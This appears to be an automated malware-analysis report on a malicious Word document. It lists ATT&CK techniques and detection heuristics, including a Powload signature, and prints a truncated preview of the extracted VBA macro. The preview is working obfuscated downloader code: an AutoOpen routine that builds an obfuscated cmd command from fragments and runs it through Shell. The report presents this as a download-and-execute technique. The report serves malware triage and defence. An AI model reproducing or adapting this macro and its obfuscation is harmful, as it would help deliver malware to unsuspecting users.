Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Word document containing a VBA macro with an AutoOpen subroutine. This macro uses the Shell function to execute a complex, obfuscated command string. The presence of the AutoOpen macro and the use of Shell indicate an attempt to download and execute a secondary payload, a common technique for malware delivery.
Heuristics (5)
- ClamAV: Doc.Malware.Powload-6775735-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6775735-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12582 bytes | 6f05538252e349eec817800cbca305d9a7d3e1f015e09d20a152ea859042c07b |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "tUYtrEjMQimj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Rnd(58075 - aramO + 33705 + dRwEA)
TypeName Hex(56683 / jGiWz * wqMLEt / wnwfUh)
TypeName Sin(BmtETP)
TypeName Cos(61991 / 82258 - MMfUju - pjiYp)
Shell@ KeyString(vbKeyC) + GjfRkQHb + OQJjlNYb + azFJYQMIISH + sZHBKX + QhlnuWFPNOl + YrmOMnYWrm + nXTVzr + EQrSGWHbvG + zGFMWfkpLqQ + cXaAAoBhdF + vCOtHdth + BNwfkfY + QKWTmQjNVUcj, 194733338 - 194733338
TypeName ChrW(8122)
TypeName CDbl(80)
End Sub
Attribute VB_Name = "MmiINbf"
Function azFJYQMIISH()
On Error Resume Next
TypeName 80
TypeName zKUsf
TypeName tMUcq
KAJGzXm = "md " + "/" + "V:/" + "C" + CStr(Chr(QotNIrinN + dRkEUYub + 34 + jcwwuifiUNLVjm + HSBMiWb)) + "s"
TypeName Sgn(784)
TypeName Rnd(2)
TypeName ChrW(22720 + zziOqV)
sYaDp = "e" + "t" + " -" + " " + " " + "=" + "oRu"
TypeName Round(762)
TypeName Sin(wGNZY)
TypeName 277419199
FraLzYMOn = "B" + "Y" + "QO" + "Z" + "iB"
TypeName Cos(EKwiGC - 49061 / 47893 + OOiGP)
TypeName CInt(63734 * azQOQ / sJrGAa + 13080)
WJuTiMdId = "ROk" + "EU" + "iNZ" + "P" + "ZV" + "Y" + "rG" + "rb" + "dS"
TypeName CDbl(PdiToW / ztjUW)
TypeName CInt(tBKzj)
TypeName CDate(31535 * 50540 - 15820 + aqABw)
jDjslESQlv = "mD" + "0" + "qv" + "a\" + "fhc" + ";X." + "} " + "5Cg" + "W"
TypeName ljFKvV
TypeName CSng(1953)
TypeName ChrW(81273288)
zCktjkPjpi = "wL" + "t" + "F" + "/{y" + ":n" + "x" + "$-" + "+6" + "," + "s" + "eA" + "=" + "Kl7"
TypeName CDbl(38101233)
TypeName CBool(XFkCtP - ZvuXwT)
ZdYNF = "p)J" + "'" + "(@j" + "&&" + "fo" + "r %" + "A i" + "n" + " (6" + "9"
TypeName Int(otilwf)
TypeName CInt(TvTrks)
TypeName 595
fusUciEMza = ";" + "0;" + "47;" + "63;" + "24;" + "62;" + "36;" + "6" + "3" + ";"
TypeName Sqr(424)
TypeName CByte(87)
TypeName Sqr(nGmLMw)
fJsPurYD = "67;" + "67;" + "4" + "2" + ";" + "57;"
TypeName ChrW(MBYdX - 9908)
TypeName CByte(407)
TypeName nNnREV
NfiprYqVVEU = "27;" + "66;" + "1" + "2" + ";6" + "5" + ";5" + "5;6" + "3;" + "47" + ";58" + ";"
azFJYQMIISH = KAJGzXm + sYaDp + FraLzYMOn + WJuTiMdId + jDjslESQlv + zCktjkPjpi + ZdYNF + fusUciEMza + fJsPurYD + NfiprYqVVEU
TypeName 3
TypeName CByte(4)
End Function
Function sZHBKX()
On Error Resume Next
TypeName Sqr(ilMdz)
TypeName ChrB(WINjEM)
TypeName 53
iuTjzL = "0" + ";2" + "5" + ";75" + ";63" + ";37"
TypeName CBool(IlGLw - DWBRIZ + 3911 - mqrDo)
TypeName CStr(9)
TypeName Sgn(KvnGB / JUdoV)
nYtGzDOUZ = ";49" + ";" + "42;" + "1" + "6;" + "63" + ";" + "4" + "9" + ";40" + ";46"
TypeName 717
TypeName CByte(226945093)
TypeName Fix(81727 * LfdiK * 85136 * FjvrHj)
XLBzq = ";" + "63;" + "25" + ";4" + "4;6" + "7" + ";" + "15;" + "63;" + "55;" + "4"
TypeName Sin(93417 - pSEvhu - Xcnwa * 18512)
TypeName Oct(413523989)
TypeName Round(jsIOq)
jzNZFA = "9;3" + "8" + ";5" + "7" + ";" + "64" + ";75" + ";28" + ";" + "6" + "5"
TypeName Sgn(185541721)
TypeName CInt(ARFSMu)
TypeName CStr(449)
aijrUj = ";7" + "2" + ";36" + ";" + "49" + ";" + "49;" + "69;" + "54" + ";51" + ";51"
TypeName 291832683
TypeName FXFQw
TypeName PLHImz
KzvCRWk = ";47" + ";4" + "7;4" + "7" + ";40" + ";0" + ";5" + "5" + ";" + "63;" + "37;"
TypeName Log(5)
TypeName CBool(kFFwmd)
TypeName Atn(bpdRJs + AmcabJ)
RjHYvPDoL = "2;2" + "5" + ";63" + ";1" + "5" + ";2"
TypeName Hex(77171 + 56298 - 87083 + SSFqZ)
TypeName 397647981
TypeName 7611225
SrJzGEJDfSB = "6;6" + "3" + ";3" + "3;6" + "2;4" + "0;3" + "7;" + "0"
TypeName TuBmW
TypeName Oct(JzCPMl)
SihqpztBFi = ";28" + ";5" + "1;" + "19;" + "2" + "5;2" + "6;" + "7" + "4"
TypeName Jaavmw
TypeName CByte(VJJjn)
TypeName 9
bRrXiRNiEs = ";" + "3" + "6;" + "49;" + "49;" + "69" + ";" + "5"
TypeName CLng(qThYp)
TypeName CSng(TCqbd /
... (truncated)